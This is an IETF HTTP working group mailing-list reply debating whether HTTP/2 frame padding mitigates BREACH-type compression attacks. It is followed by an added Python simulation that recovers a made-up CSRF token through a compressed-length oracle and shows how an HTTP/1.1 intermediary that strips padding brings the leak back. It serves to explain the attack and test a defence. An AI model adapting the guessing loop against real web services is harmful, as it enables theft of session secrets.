- From: Martin Thomson <martin.thomson@gmail.com>
- Date: Wed, 3 Sep 2014 17:25:36 -0700
- To: Brian Smith <brian@briansmith.org>
- Cc: "Roy T. Fielding" <fielding@gbiv.com>, HTTP Working Group <ietf-http-wg@w3.org>
On 3 September 2014 15:59, Brian Smith <brian@briansmith.org> wrote:
> It seems like, with the way padding is
> currently specified, no endpoint can rely on it to mitigate
> BREACH-type attacks, for the reasons I gave.

If you use TLS end-to-end, without intermediation, I see no reason that
this can't be used to mitigate BREACH (or CRIME) attacks and their ilk.
Certainly in cases where translation to HTTP/1.1 occurs, that might not
be true.

>>> So, we have to assume some implementations will choose to split
>>> the data stream at the frame boundary.
>>
>> Let us be very careful to distinguish between potentially more secure
>> because we are providing the necessary tools and more secure even when
>> people do the wrong thing. We're not aiming for the latter here.
>
> Splitting at the frame boundary is not specified as the wrong thing
> anywhere in the draft.

Nor is sticking your head out of a moving subway carriage. There is
probably a line somewhere between that makes sense. If you are willing
to provide text, I'm quite likely to accept it.
Received on Thursday, 4 September 2014 00:26:07 UTC
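The two cases Martin contrasts above (padding observed end-to-end over TLS, versus padding lost when an intermediary re-frames to HTTP/1.1) as an added, runnable illustration. This is example code written for this archive page, not code from the HTTP/2 draft, its authors, or any working-group implementation. Everything in it is constructed: the page layout, the secret token, the hex charset, the fixed padding target of 160 bytes, and the choice of zlib's Z_FIXED strategy (static Huffman table) so that each wrong guess costs exactly one extra byte and the oracle is deterministic. The "observer" simply measures frame or payload length; a real attacker would be measuring TLS record sizes.

```python
"""Simulated BREACH-style length oracle against an HTTP/2 DATA frame:
with no padding, with frame padding seen end-to-end, and with an
intermediary that strips the padding while translating to HTTP/1.1.
Added example; not code from the HTTP/2 draft or its authors.
All inputs below (page, secret, charset, pad target) are constructed."""
import struct
import zlib

SECRET = "9F3A7"              # constructed CSRF token echoed in the page
CHARSET = "0123456789ABCDEF"  # assumed token alphabet
FLAG_END_STREAM = 0x1
FLAG_PADDED = 0x8
DATA_FRAME = 0x0


def render_page(secret, reflected):
    # Attacker-controlled text ("reflected") shares one compression
    # context with the secret; the trailing '|' is a unique stop byte
    # so the only difference between guesses is the guessed character.
    return (b"<html><body><a href=/logout?csrf=" + secret.encode()
            + b">Log out</a><p>You searched for: " + reflected.encode()
            + b"|</p></body></html>")


def compress_body(body):
    # Z_FIXED pins zlib to the static Huffman table, so one extra literal
    # costs exactly 8 bits. With dynamic Huffman the signal is noisier;
    # the original BREACH work handles that noise separately.
    c = zlib.compressobj(level=6, strategy=zlib.Z_FIXED)
    return c.compress(body) + c.flush()


def build_data_frame(stream_id, payload, pad_to=None, end_stream=True):
    """HTTP/2 DATA frame (RFC 7540 section 6.1). If pad_to is given, the
    frame payload (Pad Length byte + data + padding) is exactly pad_to."""
    flags = FLAG_END_STREAM if end_stream else 0
    body = payload
    if pad_to is not None:
        pad_len = pad_to - len(payload) - 1   # one byte carries Pad Length
        if not 0 <= pad_len <= 255:
            raise ValueError("cannot pad payload to requested size")
        flags |= FLAG_PADDED
        body = bytes([pad_len]) + payload + bytes(pad_len)
    header = (len(body).to_bytes(3, "big") + bytes([DATA_FRAME, flags])
              + struct.pack("!I", stream_id & 0x7FFFFFFF))
    return header + body


def parse_data_frame(frame):
    """Return (stream_id, flags, data) with padding removed, as a
    receiver or a translating intermediary would."""
    length = int.from_bytes(frame[:3], "big")
    flags = frame[4]
    stream_id = int.from_bytes(frame[5:9], "big") & 0x7FFFFFFF
    body = frame[9:9 + length]
    if flags & FLAG_PADDED:
        pad_len = body[0]
        if pad_len >= len(body):   # RFC 7540: padding >= payload is PROTOCOL_ERROR
            raise ValueError("padding exceeds frame payload")
        return stream_id, flags, body[1:len(body) - pad_len]
    return stream_id, flags, body


def origin_frame(reflected, pad_to=None):
    return build_data_frame(1, compress_body(render_page(SECRET, reflected)), pad_to)


def tls_observer_len(reflected, pad_to=None):
    # End-to-end TLS: the network sees the whole frame, padding included.
    return len(origin_frame(reflected, pad_to))


def http11_proxy_observer_len(reflected, pad_to=None):
    # A translating intermediary parses the frame and forwards only the
    # data; the padding never reaches the next hop, so the length leaks again.
    _, _, data = parse_data_frame(origin_frame(reflected, pad_to))
    return len(data)


def breach(oracle, length=len(SECRET), charset=CHARSET):
    """Recover the token one character at a time by picking the guess that
    compresses smallest. Returns None when the oracle gives no unique minimum."""
    known = ""
    for _ in range(length):
        sizes = {c: oracle("csrf=" + known + c) for c in charset}
        best = min(sizes.values())
        winners = [c for c, n in sizes.items() if n == best]
        if len(winners) != 1:
            return None
        known += winners[0]
    return known


if __name__ == "__main__":
    print("no padding, end-to-end:  ", breach(tls_observer_len))
    print("padded to 160, end-to-end:", breach(lambda r: tls_observer_len(r, pad_to=160)))
    print("padded, via HTTP/1.1 hop: ", breach(lambda r: http11_proxy_observer_len(r, pad_to=160)))
```

Run stand-alone, the first and third lines print the constructed token and the second prints None: padding to a fixed frame size removes the one-byte-per-character signal for an observer on the TLS path, while an intermediary that parses the DATA frame and re-emits only its data hands the unpadded length to whoever is watching the next hop. Note that the frame builder rejects a pad target it cannot meet, and the parser rejects a Pad Length that is not smaller than the frame payload, which is the check the draft requires of receivers.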